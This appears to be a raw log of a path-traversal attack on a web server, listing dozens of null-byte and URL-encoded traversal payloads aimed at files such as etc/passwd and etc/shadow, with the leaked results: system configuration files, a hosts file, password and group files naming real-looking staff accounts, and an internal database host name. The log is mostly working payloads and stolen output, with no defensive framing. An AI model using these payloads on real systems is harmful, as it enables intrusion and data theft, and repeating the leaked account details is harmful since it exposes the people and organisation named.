- probably don't want to listen on any more addresses, add any more
- auth mechanisms, run as a different user, etc. -->
- <!DOCTYPE busconfig PUBLIC "-//freedesktop//DTD D-Bus Bus Configuration 1.0//EN"
- "http://www.freedesktop.org/standards/dbus/1.0/busconfig.dtd">
- <busconfig>
- <!-- Our well-known bus type, do not change this -->
- <type>system</type>
- <!-- Run as special user -->
- <user>dbus</user>
- <!-- Fork into daemon mode -->
- <fork/>
- <!-- We use system service launching using a helper -->
- <standard_system_servicedirs/>
- <!-- This is a setuid helper that is used to launch system services -->
- <servicehelper>/lib64/dbus-1/dbus-daemon-launch-helper</servicehelper>
- <!-- Write a pid file -->
- <pidfile>/var/run/messagebus.pid</pidfile>
- <!-- Enable logging to syslog -->
- <syslog/>
- <!-- Only allow socket-credentials-based authentication -->
- <auth>EXTERNAL</auth>
- <!-- Only listen on a local socket. (abstract=/path/to/socket
- means use abstract namespace, don't really create filesystem
- file; only Linux supports this. Use path=/whatever on other
- systems.) -->
- <listen>unix:path=/var/run/dbus/system_bus_socket</listen>
- <policy context="default">
- <!-- All users can connect to system bus -->
- <allow user="*"/>
- <!-- Holes must be punched in service configuration files for
- name ownership and sending method calls -->
- <deny own="*"/>
- <deny send_type="method_call"/>
- <!-- Signals and reply messages (method returns, errors) are allowed
- by default -->
- <allow send_type="signal"/>
- <allow send_requested_reply="true" send_type="method_return"/>
- <allow send_requested_reply="true" send_type="error"/>
- <!-- All messages may be received by default -->
- <allow receive_type="method_call"/>
- <allow receive_type="method_return"/>
- <allow receive_type="error"/>
- <allow receive_type="signal"/>
- <!-- Allow anyone to talk to the message bus -->
- <allow send_destination="org.freedesktop.DBus"/>
- <!-- But disallow some specific bus services -->
- <deny send_destination="org.freedesktop.DBus"
- send_interface="org.freedesktop.DBus"
- send_member="UpdateActivationEnvironment"/>
- </policy>
- <!-- Config files are placed here that among other things, punch
- holes in the above policy for specific services. -->
- <includedir>system.d</includedir>
- <!-- This is included last so local configuration can override what's
- in this standard file -->
- <include ignore_missing="yes">system-local.conf</include>
- <include if_selinux_enabled="yes" selinux_root_relative="yes">contexts/dbus_contexts</include>
- </busconfig>
- <b>Query Used: etc/etter.conf%00</b>.<b>Query Used: etc/pm/config.d%00</b><b>Query Used: etc/pm/config.d/00sleep_module%00</b>.<b>Query Used: etc/depmod.d/ubuntu.conf%00</b>.<b>Query Used: etc/unicornscan/payloads.conf%00</b>.<b>Query Used: etc/unicornscan/unicorn.conf%00</b>.<b>Query Used: etc/unicornscan/modules.conf%00</b>.<b>Query Used: etc/console-tools/config.d%00</b>.<b>Query Used: etc/console-tools/config.d/splashy%00</b>.<b>Query Used: etc/tpvmlp.conf%00</b>.<b>Query Used: etc/mtools.conf%00</b>.<b>Query Used: etc/kernel-img.conf%00</b>.<b>Query Used: etc/ca-certificates.conf.dpkg-old%00</b>.<b>Query Used: etc/ld.so.conf%00</b>include ld.so.conf.d/*.conf
- <b>Query Used: etc/conky/conky.conf%00</b>.<b>Query Used: etc/ucf.conf%00</b>.<b>Query Used: etc/rinetd.conf%00</b>.<b>Query Used: etc/e2fsck.conf%00</b>.<b>Query Used: etc/gdm/failsafeDexconf%00</b>.<b>Query Used: etc/foomatic/filter.conf%00</b>.<b>Query Used: etc/manpath.config%00</b>.<b>Query Used: etc/esound/esd.conf%00</b>.<b>Query Used: etc/tsocks.conf%00</b>.<b>Query Used: etc/stunnel/stunnel.conf%00</b>.<b>Query Used: etc/fuse.conf%00</b>.<b>Query Used: etc/uniconf.conf%00</b>.<b>Query Used: etc/syslog.conf%00</b>Array
- (
- [0] => Could not connect to host server: mysqlread.md.nids.noaa.gov
- Too many connections
- )
- <b>Query Used: etc/cvs-cron.conf%00</b>.<b>Query Used: etc/snmp/snmpd.conf%00</b>###############################################################################
- #
- # snmpd.conf:
- # An example configuration file for configuring the ucd-snmp snmpd agent.
- #
- ###############################################################################
- #
- # This file is intended to only be as a starting point. Many more
- # configuration directives exist than are mentioned in this file. For
- # full details, see the snmpd.conf(5) manual page.
- #
- # All lines beginning with a '#' are comments and are intended for you
- # to read. All other lines are configuration commands for the agent.
- ###############################################################################
- # Access Control
- ###############################################################################
- # As shipped, the snmpd demon will only respond to queries on the
- # system mib group until this file is replaced or modified for
- # security purposes. Examples are shown below about how to increase the
- # level of access.
- # By far, the most common question I get about the agent is "why won't
- # it work?", when really it should be "how do I configure the agent to
- # allow me to access it?"
- #
- # By default, the agent responds to the "public" community for read
- # only access, if run out of the box without any configuration file in
- # place. The following examples show you other ways of configuring
- # the agent so that you can change the community names, and give
- # yourself write access to the mib tree as well.
- #
- # For more information, read the FAQ as well as the snmpd.conf(5)
- # manual page.
- ####
- # First, map the community name "public" into a "security name"
- # sec.name source community
- com2sec notConfigUser default public
- ####
- # Second, map the security name into a group name:
- # groupName securityModel securityName
- group notConfigGroup v1 notConfigUser
- group notConfigGroup v2c notConfigUser
- ####
- # Third, create a view for us to let the group have rights to:
- # Make at least snmpwalk -v 1 localhost -c public system fast again.
- # name incl/excl subtree mask(optional)
- view systemview included .1.3.6.1.2.1.1
- view systemview included .1.3.6.1.2.1.25.1.1
- ####
- # Finally, grant the group read-only access to the systemview view.
- # group context sec.model sec.level prefix read write notif
- access notConfigGroup "" any noauth exact systemview none none
- # -----------------------------------------------------------------------------
- # Here is a commented out example configuration that allows less
- # restrictive access.
- # YOU SHOULD CHANGE THE "COMMUNITY" TOKEN BELOW TO A NEW KEYWORD ONLY
- # KNOWN AT YOUR SITE. YOU *MUST* CHANGE THE NETWORK TOKEN BELOW TO
- # SOMETHING REFLECTING YOUR LOCAL NETWORK ADDRESS SPACE.
- ## sec.name source community
- #com2sec local localhost COMMUNITY
- #com2sec mynetwork NETWORK/24 COMMUNITY
- ## group.name sec.model sec.name
- #group MyRWGroup any local
- #group MyROGroup any mynetwork
- #
- #group MyRWGroup any otherv3user
- #...
- ## incl/excl subtree mask
- #view all included .1 80
- ## -or just the mib2 tree-
- #view mib2 included .iso.org.dod.internet.mgmt.mib-2 fc
- ## context sec.model sec.level prefix read write notif
- #access MyROGroup "" any noauth 0 all none none
- #access MyRWGroup "" any noauth 0 all all all
- ###############################################################################
- # Sample configuration to make net-snmpd RFC 1213.
- # Unfortunately v1 and v2c don't allow any user based authentification, so
- # opening up the default config is not an option from a security point.
- #
- # WARNING: If you uncomment the following lines you allow write access to your
- # snmpd daemon from any source! To avoid this use different names for your
- # community or split out the write access to a different community and
- # restrict it to your local network.
- # Also remember to comment the syslocation and syscontact parameters later as
- # otherwise they are still read only (see FAQ for net-snmp).
- #
- # First, map the community name "public" into a "security name"
- # sec.name source community
- #com2sec notConfigUser default public
- # Second, map the security name into a group name:
- # groupName securityModel securityName
- #group notConfigGroup v1 notConfigUser
- #group notConfigGroup v2c notConfigUser
- # Third, create a view for us to let the group have rights to:
- # Open up the whole tree for ro, make the RFC 1213 required ones rw.
- # name incl/excl subtree mask(optional)
- #view roview included .1
- #view rwview included system.sysContact
- #view rwview included system.sysName
- #view rwview included system.sysLocation
- #view rwview included interfaces.ifTable.ifEntry.ifAdminStatus
- #view rwview included at.atTable.atEntry.atPhysAddress
- #view rwview included at.atTable.atEntry.atNetAddress
- #view rwview included ip.ipForwarding
- #view rwview included ip.ipDefaultTTL
- #view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteDest
- #view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteIfIndex
- #view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteMetric1
- #view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteMetric2
- #view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteMetric3
- #view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteMetric4
- #view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteType
- #view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteAge
- #view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteMask
- #view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteMetric5
- #view rwview included ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaIfIndex
- #view rwview included ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaPhysAddress
- #view rwview included ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaNetAddress
- #view rwview included ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaType
- #view rwview included tcp.tcpConnTable.tcpConnEntry.tcpConnState
- #view rwview included egp.egpNeighTable.egpNeighEntry.egpNeighEventTrigger
- #view rwview included snmp.snmpEnableAuthenTraps
- # Finally, grant the group read-only access to the systemview view.
- # group context sec.model sec.level prefix read write notif
- #access notConfigGroup "" any noauth exact roview rwview none
- ###############################################################################
- # System contact information
- #
- # It is also possible to set the sysContact and sysLocation system
- # variables through the snmpd.conf file:
- syslocation Unknown (edit /etc/snmp/snmpd.conf)
- syscontact Root <root@localhost> (configure /etc/snmp/snmp.local.conf)
- # Example output of snmpwalk:
- # % snmpwalk -v 1 localhost -c public system
- # system.sysDescr.0 = "SunOS name sun4c"
- # system.sysObjectID.0 = OID: enterprises.ucdavis.ucdSnmpAgent.sunos4
- # system.sysUpTime.0 = Timeticks: (595637548) 68 days, 22:32:55
- # system.sysContact.0 = "Me <me@somewhere.org>"
- # system.sysName.0 = "name"
- # system.sysLocation.0 = "Right here, right now."
- # system.sysServices.0 = 72
- ###############################################################################
- # Logging
- #
- # We do not want annoying "Connection from UDP: " messages in syslog.
- # If the following option is commented out, snmpd will print each incoming
- # connection, which can be useful for debugging.
- dontLogTCPWrappersConnects yes
- # -----------------------------------------------------------------------------
- ###############################################################################
- # Process checks.
- #
- # The following are examples of how to use the agent to check for
- # processes running on the host. The syntax looks something like:
- #
- # proc NAME [MAX=0] [MIN=0]
- #
- # NAME: the name of the process to check for. It must match
- # exactly (ie, http will not find httpd processes).
- # MAX: the maximum number allowed to be running. Defaults to 0.
- # MIN: the minimum number to be running. Defaults to 0.
- #
- # Examples (commented out by default):
- #
- # Make sure mountd is running
- #proc mountd
- # Make sure there are no more than 4 ntalkds running, but 0 is ok too.
- #proc ntalkd 4
- # Make sure at least one sendmail, but less than or equal to 10 are running.
- #proc sendmail 10 1
- # A snmpwalk of the process mib tree would look something like this:
- #
- # % snmpwalk -v 1 localhost -c public .1.3.6.1.4.1.2021.2
- # enterprises.ucdavis.procTable.prEntry.prIndex.1 = 1
- # enterprises.ucdavis.procTable.prEntry.prIndex.2 = 2
- # enterprises.ucdavis.procTable.prEntry.prIndex.3 = 3
- # enterprises.ucdavis.procTable.prEntry.prNames.1 = "mountd"
- # enterprises.ucdavis.procTable.prEntry.prNames.2 = "ntalkd"
- # enterprises.ucdavis.procTable.prEntry.prNames.3 = "sendmail"
- # enterprises.ucdavis.procTable.prEntry.prMin.1 = 0
- # enterprises.ucdavis.procTable.prEntry.prMin.2 = 0
- # enterprises.ucdavis.procTable.prEntry.prMin.3 = 1
- # enterprises.ucdavis.procTable.prEntry.prMax.1 = 0
- # enterprises.ucdavis.procTable.prEntry.prMax.2 = 4
- # enterprises.ucdavis.procTable.prEntry.prMax.3 = 10
- # enterprises.ucdavis.procTable.prEntry.prCount.1 = 0
- # enterprises.ucdavis.procTable.prEntry.prCount.2 = 0
- # enterprises.ucdavis.procTable.prEntry.prCount.3 = 1
- # enterprises.ucdavis.procTable.prEntry.prErrorFlag.1 = 1
- # enterprises.ucdavis.procTable.prEntry.prErrorFlag.2 = 0
- # enterprises.ucdavis.procTable.prEntry.prErrorFlag.3 = 0
- # enterprises.ucdavis.procTable.prEntry.prErrMessage.1 = "No mountd process running."
- # enterprises.ucdavis.procTable.prEntry.prErrMessage.2 = ""
- # enterprises.ucdavis.procTable.prEntry.prErrMessage.3 = ""
- # enterprises.ucdavis.procTable.prEntry.prErrFix.1 = 0
- # enterprises.ucdavis.procTable.prEntry.prErrFix.2 = 0
- # enterprises.ucdavis.procTable.prEntry.prErrFix.3 = 0
- #
- # Note that the errorFlag for mountd is set to 1 because one is not
- # running (in this case an rpc.mountd is, but thats not good enough),
- # and the ErrMessage tells you what's wrong. The configuration
- # imposed in the snmpd.conf file is also shown.
- #
- # Special Case: When the min and max numbers are both 0, it assumes
- # you want a max of infinity and a min of 1.
- #
- # -----------------------------------------------------------------------------
- ###############################################################################
- # Executables/scripts
- #
- #
- # You can also have programs run by the agent that return a single
- # line of output and an exit code. Here are two examples.
- #
- # exec NAME PROGRAM [ARGS ...]
- #
- # NAME: A generic name. The name must be unique for each exec statement.
- # PROGRAM: The program to run. Include the path!
- # ARGS: optional arguments to be passed to the program
- # a simple hello world
- #exec echotest /bin/echo hello world
- # Run a shell script containing:
- #
- # #!/bin/sh
- # echo hello world
- # echo hi there
- # exit 35
- #
- # Note: this has been specifically commented out to prevent
- # accidental security holes due to someone else on your system writing
- # a /tmp/shtest before you do. Uncomment to use it.
- #
- #exec shelltest /bin/sh /tmp/shtest
- # Then,
- # % snmpwalk -v 1 localhost -c public .1.3.6.1.4.1.2021.8
- # enterprises.ucdavis.extTable.extEntry.extIndex.1 = 1
- # enterprises.ucdavis.extTable.extEntry.extIndex.2 = 2
- # enterprises.ucdavis.extTable.extEntry.extNames.1 = "echotest"
- # enterprises.ucdavis.extTable.extEntry.extNames.2 = "shelltest"
- # enterprises.ucdavis.extTable.extEntry.extCommand.1 = "/bin/echo hello world"
- # enterprises.ucdavis.extTable.extEntry.extCommand.2 = "/bin/sh /tmp/shtest"
- # enterprises.ucdavis.extTable.extEntry.extResult.1 = 0
- # enterprises.ucdavis.extTable.extEntry.extResult.2 = 35
- # enterprises.ucdavis.extTable.extEntry.extOutput.1 = "hello world."
- # enterprises.ucdavis.extTable.extEntry.extOutput.2 = "hello world."
- # enterprises.ucdavis.extTable.extEntry.extErrFix.1 = 0
- # enterprises.ucdavis.extTable.extEntry.extErrFix.2 = 0
- # Note that the second line of the /tmp/shtest shell script is cut
- # off. Also note that the exit status of 35 was returned.
- # -----------------------------------------------------------------------------
- ###############################################################################
- # disk checks
- #
- # The agent can check the amount of available disk space, and make
- # sure it is above a set limit.
- # disk PATH [MIN=100000]
- #
- # PATH: mount path to the disk in question.
- # MIN: Disks with space below this value will have the Mib's errorFlag set.
- # Default value = 100000.
- # Check the / partition and make sure it contains at least 10 megs.
- #disk / 10000
- # % snmpwalk -v 1 localhost -c public .1.3.6.1.4.1.2021.9
- # enterprises.ucdavis.diskTable.dskEntry.diskIndex.1 = 0
- # enterprises.ucdavis.diskTable.dskEntry.diskPath.1 = "/" Hex: 2F
- # enterprises.ucdavis.diskTable.dskEntry.diskDevice.1 = "/dev/dsk/c201d6s0"
- # enterprises.ucdavis.diskTable.dskEntry.diskMinimum.1 = 10000
- # enterprises.ucdavis.diskTable.dskEntry.diskTotal.1 = 837130
- # enterprises.ucdavis.diskTable.dskEntry.diskAvail.1 = 316325
- # enterprises.ucdavis.diskTable.dskEntry.diskUsed.1 = 437092
- # enterprises.ucdavis.diskTable.dskEntry.diskPercent.1 = 58
- # enterprises.ucdavis.diskTable.dskEntry.diskErrorFlag.1 = 0
- # enterprises.ucdavis.diskTable.dskEntry.diskErrorMsg.1 = ""
- # -----------------------------------------------------------------------------
- ###############################################################################
- # load average checks
- #
- # load [1MAX=12.0] [5MAX=12.0] [15MAX=12.0]
- #
- # 1MAX: If the 1 minute load average is above this limit at query
- # time, the errorFlag will be set.
- # 5MAX: Similar, but for 5 min average.
- # 15MAX: Similar, but for 15 min average.
- # Check for loads:
- #load 12 14 14
- # % snmpwalk -v 1 localhost -c public .1.3.6.1.4.1.2021.10
- # enterprises.ucdavis.loadTable.laEntry.loadaveIndex.1 = 1
- # enterprises.ucdavis.loadTable.laEntry.loadaveIndex.2 = 2
- # enterprises.ucdavis.loadTable.laEntry.loadaveIndex.3 = 3
- # enterprises.ucdavis.loadTable.laEntry.loadaveNames.1 = "Load-1"
- # enterprises.ucdavis.loadTable.laEntry.loadaveNames.2 = "Load-5"
- # enterprises.ucdavis.loadTable.laEntry.loadaveNames.3 = "Load-15"
- # enterprises.ucdavis.loadTable.laEntry.loadaveLoad.1 = "0.49" Hex: 30 2E 34 39
- # enterprises.ucdavis.loadTable.laEntry.loadaveLoad.2 = "0.31" Hex: 30 2E 33 31
- # enterprises.ucdavis.loadTable.laEntry.loadaveLoad.3 = "0.26" Hex: 30 2E 32 36
- # enterprises.ucdavis.loadTable.laEntry.loadaveConfig.1 = "12.00"
- # enterprises.ucdavis.loadTable.laEntry.loadaveConfig.2 = "14.00"
- # enterprises.ucdavis.loadTable.laEntry.loadaveConfig.3 = "14.00"
- # enterprises.ucdavis.loadTable.laEntry.loadaveErrorFlag.1 = 0
- # enterprises.ucdavis.loadTable.laEntry.loadaveErrorFlag.2 = 0
- # enterprises.ucdavis.loadTable.laEntry.loadaveErrorFlag.3 = 0
- # enterprises.ucdavis.loadTable.laEntry.loadaveErrMessage.1 = ""
- # enterprises.ucdavis.loadTable.laEntry.loadaveErrMessage.2 = ""
- # enterprises.ucdavis.loadTable.laEntry.loadaveErrMessage.3 = ""
- # -----------------------------------------------------------------------------
- ###############################################################################
- # Extensible sections.
- #
- # This alleviates the multiple line output problem found in the
- # previous executable mib by placing each mib in its own mib table:
- # Run a shell script containing:
- #
- # #!/bin/sh
- # echo hello world
- # echo hi there
- # exit 35
- #
- # Note: this has been specifically commented out to prevent
- # accidental security holes due to someone else on your system writing
- # a /tmp/shtest before you do. Uncomment to use it.
- #
- # exec .1.3.6.1.4.1.2021.50 shelltest /bin/sh /tmp/shtest
- # % snmpwalk -v 1 localhost -c public .1.3.6.1.4.1.2021.50
- # enterprises.ucdavis.50.1.1 = 1
- # enterprises.ucdavis.50.2.1 = "shelltest"
- # enterprises.ucdavis.50.3.1 = "/bin/sh /tmp/shtest"
- # enterprises.ucdavis.50.100.1 = 35
- # enterprises.ucdavis.50.101.1 = "hello world."
- # enterprises.ucdavis.50.101.2 = "hi there."
- # enterprises.ucdavis.50.102.1 = 0
- # Now the Output has grown to two lines, and we can see the 'hi
- # there.' output as the second line from our shell script.
- #
- # Note that you must alter the mib.txt file to be correct if you want
- # the .50.* outputs above to change to reasonable text descriptions.
- # Other ideas:
- #
- # exec .1.3.6.1.4.1.2021.51 ps /bin/ps
- # exec .1.3.6.1.4.1.2021.52 top /usr/local/bin/top
- # exec .1.3.6.1.4.1.2021.53 mailq /usr/bin/mailq
- # -----------------------------------------------------------------------------
- ###############################################################################
- # Pass through control.
- #
- # Usage:
- # pass MIBOID EXEC-COMMAND
- #
- # This will pass total control of the mib underneath the MIBOID
- # portion of the mib to the EXEC-COMMAND.
- #
- # Note: You'll have to change the path of the passtest script to your
- # source directory or install it in the given location.
- #
- # Example: (see the script for details)
- # (commented out here since it requires that you place the
- # script in the right location. (its not installed by default))
- # pass .1.3.6.1.4.1.2021.255 /bin/sh /usr/local/local/passtest
- # % snmpwalk -v 1 localhost -c public .1.3.6.1.4.1.2021.255
- # enterprises.ucdavis.255.1 = "life the universe and everything"
- # enterprises.ucdavis.255.2.1 = 42
- # enterprises.ucdavis.255.2.2 = OID: 42.42.42
- # enterprises.ucdavis.255.3 = Timeticks: (363136200) 42 days, 0:42:42
- # enterprises.ucdavis.255.4 = IpAddress: 127.0.0.1
- # enterprises.ucdavis.255.5 = 42
- # enterprises.ucdavis.255.6 = Gauge: 42
- #
- # % snmpget -v 1 localhost public .1.3.6.1.4.1.2021.255.5
- # enterprises.ucdavis.255.5 = 42
- #
- # % snmpset -v 1 localhost public .1.3.6.1.4.1.2021.255.1 s "New string"
- # enterprises.ucdavis.255.1 = "New string"
- #
- # For specific usage information, see the man/snmpd.conf.5 manual page
- # as well as the local/passtest script used in the above example.
- ###############################################################################
- PART 2
- <b>Query Used: %00</b><b>Query Used: etc/hosts%00</b>127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4
- ::1 localhost localhost.localdomain localhost6 localhost6.localdomain6
- <b>Query Used: etc/passwd%00</b>root:x:0:0:root:/root:/bin/bash
- bin:x:1:1:bin:/bin:/sbin/nologin
- daemon:x:2:2:daemon:/sbin:/sbin/nologin
- adm:x:3:4:adm:/var/adm:/sbin/nologin
- lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
- sync:x:5:0:sync:/sbin:/bin/sync
- shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
- halt:x:7:0:halt:/sbin:/sbin/halt
- mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
- uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
- operator:x:11:0:operator:/root:/sbin/nologin
- games:x:12:100:games:/usr/games:/sbin/nologin
- gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
- ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
- nobody:x:99:99:Nobody:/:/sbin/nologin
- dbus:x:81:81:System message bus:/:/sbin/nologin
- vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
- rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
- abrt:x:499:499::/etc/abrt:/sbin/nologin
- saslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
- mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
- smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
- haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
- ntp:x:38:38::/etc/ntp:/sbin/nologin
- rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
- nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
- apache:x:48:48:Apache:/var/www:/sbin/nologin
- webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
- sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
- postfix:x:89:89::/var/spool/postfix:/sbin/nologin
- tcpdump:x:72:72::/:/sbin/nologin
- cmccan:x:500:500:Chad McCan:/home/cmccan:/bin/bash
- darnold:x:501:501:Dan Arnold:/home/darnold:/bin/bash
- kmars:x:503:503:Kolly Mars:/home/kmars:/bin/bash
- mstrydom:x:533:533:Malcolm Strydom:/home/mstrydom:/bin/bash
- zabbix:x:309:309:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
- clamav:x:311:311:Clamav scanner user:/home/clamav:/sbin/nologin
- clamupdate:x:312:312:Clamav database update user:/var/lib/clamav:/sbin/nologin
- clam:x:308:308:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
- ahps:x:303:303:AHPS System Account:/vol/ahps:/sbin/nologin
- nscanner:x:424:424:Nessus Scanner:/home/nscanner:/bin/bash
- memcached:x:302:302:Memcached daemon:/var/run/memcached:/sbin/nologin
- <b>Query Used: ..\%20\..\%20\..\%20\etc/passwd%00</b>.<b>Query Used: ..\..\..\..\..\..\..\..\..\..\etc\passwd%00</b>.<b>Query Used: ../../../../../../../../../../etc/passwd%00</b>.<b>Query Used: ../../../../../../../../../../etc/hosts%00</b>.<b>Query Used: ..\..\..\..\..\..\..\..\..\..\etc\group%00</b>.<b>Query Used: .\./.\./.\./.\./.\./.\./etc/passwd%00</b>.<b>Query Used: .\./.\./.\./.\./.\./.\./etc/shadow%00</b>.<b>Query Used: /%00</b><b>Query Used: %00/%00</b><b>Query Used: /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00</b>.<b>Query Used: %2A%00</b>.<b>Query Used: /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00</b>root:x:0:0:root:/root:/bin/bash
- bin:x:1:1:bin:/bin:/sbin/nologin
- daemon:x:2:2:daemon:/sbin:/sbin/nologin
- adm:x:3:4:adm:/var/adm:/sbin/nologin
- lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
- sync:x:5:0:sync:/sbin:/bin/sync
- shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
- halt:x:7:0:halt:/sbin:/sbin/halt
- mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
- uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
- operator:x:11:0:operator:/root:/sbin/nologin
- games:x:12:100:games:/usr/games:/sbin/nologin
- gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
- ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
- nobody:x:99:99:Nobody:/:/sbin/nologin
- dbus:x:81:81:System message bus:/:/sbin/nologin
- vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
- rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
- abrt:x:499:499::/etc/abrt:/sbin/nologin
- saslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
- mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
- smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
- haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
- ntp:x:38:38::/etc/ntp:/sbin/nologin
- rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
- nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
- apache:x:48:48:Apache:/var/www:/sbin/nologin
- webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
- sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
- postfix:x:89:89::/var/spool/postfix:/sbin/nologin
- tcpdump:x:72:72::/:/sbin/nologin
- cmccan:x:500:500:Chad McCan:/home/cmccan:/bin/bash
- darnold:x:501:501:Dan Arnold:/home/darnold:/bin/bash
- kmars:x:503:503:Kolly Mars:/home/kmars:/bin/bash
- mstrydom:x:533:533:Malcolm Strydom:/home/mstrydom:/bin/bash
- zabbix:x:309:309:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
- clamav:x:311:311:Clamav scanner user:/home/clamav:/sbin/nologin
- clamupdate:x:312:312:Clamav database update user:/var/lib/clamav:/sbin/nologin
- clam:x:308:308:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
- ahps:x:303:303:AHPS System Account:/vol/ahps:/sbin/nologin
- nwschat:x:320:320:NWSChat System Account:/home/nwschat:/sbin/nolo
- forecast:x:302:302:Forecast System Account:/vol/forecast:/sbin/nologin
- ndfd:x:306:306:NDFD System Account:/home/ndfd:/sbin/nologin
- nscanner:x:424:424:Nessus Scanner:/home/nscanner:/bin/bash
- memcached:x:301:301:Memcached daemon:/var/run/memcached:/sbin/nologin
- <b>Query Used: /////etc/passwd%00</b>root:x:0:0:root:/root:/bin/bash
- bin:x:1:1:bin:/bin:/sbin/nologin
- daemon:x:2:2:daemon:/sbin:/sbin/nologin
- adm:x:3:4:adm:/var/adm:/sbin/nologin
- lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
- sync:x:5:0:sync:/sbin:/bin/sync
- shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
- halt:x:7:0:halt:/sbin:/sbin/halt
- mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
- uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
- operator:x:11:0:operator:/root:/sbin/nologin
- games:x:12:100:games:/usr/games:/sbin/nologin
- gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
- ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
- nobody:x:99:99:Nobody:/:/sbin/nologin
- dbus:x:81:81:System message bus:/:/sbin/nologin
- vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
- rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
- abrt:x:499:499::/etc/abrt:/sbin/nologin
- saslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
- mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
- smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
- haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
- ntp:x:38:38::/etc/ntp:/sbin/nologin
- rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
- nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
- apache:x:48:48:Apache:/var/www:/sbin/nologin
- webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
- sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
- postfix:x:89:89::/var/spool/postfix:/sbin/nologin
- tcpdump:x:72:72::/:/sbin/nologin
- cmccan:x:500:500:cmccan:/home/cmccan:/bin/bash
- darnold:x:501:501:darnold:/home/darnold:/bin/bash
- kmars:x:503:503:kmars:/home/kmars:/bin/bash
- zabbix:x:309:309:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
- clamav:x:311:311:Clamav scanner user:/home/clamav:/sbin/nologin
- clamupdate:x:312:312:Clamav database update user:/var/lib/clamav:/sbin/nologin
- clam:x:308:308:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
- mstrydom:x:533:533:Malcolm Strydom:/home/mstrydom:/bin/bash
- ahps:x:303:303:AHPS System Account:/vol/ahps:/sbin/nologin
- nwschat:x:320:320:NWSChat System Account:/home/nwschat:/sbin/nologin
- nscanner:x:424:424:Nessus Scanner:/home/nscanner:/bin/bash
- memcached:x:302:302:Memcached daemon:/var/run/memcached:/sbin/nologin
- <b>Query Used: /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/group%00</b>root:x:0:root
- bin:x:1:root,bin,daemon
- daemon:x:2:root,bin,daemon
- sys:x:3:root,bin,adm
- adm:x:4:root,adm,daemon
- tty:x:5:
- disk:x:6:root
- lp:x:7:daemon,lp
